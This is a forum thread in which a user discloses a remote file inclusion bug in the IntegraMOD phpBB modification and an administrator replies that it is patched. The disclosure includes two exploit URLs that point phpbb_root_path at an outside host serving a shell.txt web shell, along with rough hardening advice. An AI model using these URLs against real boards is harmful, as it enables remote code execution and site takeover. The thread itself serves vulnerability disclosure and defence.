IntegraMOD

hi guys all know my nam is sasan i have a security forum and my last ID in this forum and integramod site is 4shir ! i love fube and integramod and cant see the forum of integra hacked by kidi and scripts hacker!!!!! <img> if you want know whats integra mod can see this lins
http://[target]/[patch]/includes/functions_mod_user.php?phpbb_root_path=http://url--ataca.org/shell.txt?
#
# http://[target]/[patch]/includes/functions.php?phpbb_root_path=http://url--ataca.org/shell.txt?

its new bug for integra mod this in File Inclusion Vulnerabilities class ! and hacker can use a external shell on your board !! if want dont hack whit this method
1- pleas off global register
2- redirect all invalid links
3- chang all 777 folder permishon or upload a htasec on this folder
3 - and a powerfull its you set password for your folder such includs templat and...
i back and see more an also put here last bug for integra

Thanks sasan, the security holes have been plugged... your second link references functions_mod_user.php which doesn't exist in 140 or 141 (i can find it) must be an old file.

Adding passowrd protection via htaccess to the other folders is a good idea, currently we use the index.html method... so if anyone browses to a folder all they get is a simple index file....

Which reminds me... Guys make sure there is a copy of the simple index.html in all folders that don't contain a real index.php... this should be as good a method as htaccess password protection and a great deal faster.

Thanks for the input, if you come across and other security leaks please contact us asap.
Mike